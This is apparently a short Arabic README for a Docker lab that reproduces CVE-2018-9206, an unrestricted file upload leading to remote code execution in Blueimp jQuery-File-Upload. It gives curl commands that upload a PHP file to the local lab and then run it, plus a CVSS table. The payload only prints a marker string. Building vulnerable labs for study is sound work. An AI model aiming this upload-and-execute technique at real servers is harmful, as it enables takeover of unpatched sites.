
بيئة مختبرية قائمة على Docker لثغرة CVE-2018-9206 (رفع ملفات غير مقيد في Blueimp jQuery-File-Upload يؤدي إلى تنفيذ أوامر عن بُعد RCE) مع نصوص برمجية لإثبات المفهوم (PoC) وأوامر للتحقق.
بيئة Docker قابلة للاختراق لـ CVE-2018-9206 - رفع ملفات غير مقيد في Blueimp jQuery-File-Upload <= 9.22.0.
docker compose up -d --build
التطبيق متاح على: http://localhost:8888/jQuery-File-Upload/
# Upload a PHP file
curl -X POST "http://localhost:8888/jQuery-File-Upload/server/php/index.php" \
-F 'files[]=@/dev/stdin;filename=test.php' <<< '<?php echo "CVE-2018-9206-PWNED"; ?>'
# Execute it
curl "http://localhost:8888/jQuery-File-Upload/server/php/files/test.php"
# Output: CVE-2018-9206-PWNED
أو شغّل سكربت PoC:
./scripts/poc.sh
docker compose down -v
| الحقل | القيمة |
|---|---|
| CVE | CVE-2018-9206 |
| المنتج | Blueimp jQuery-File-Upload |
| الإصدار | 9.22.0 |
| النوع | رفع ملفات غير مقيد → RCE |
| CVSS | 9.8 (حرجة) |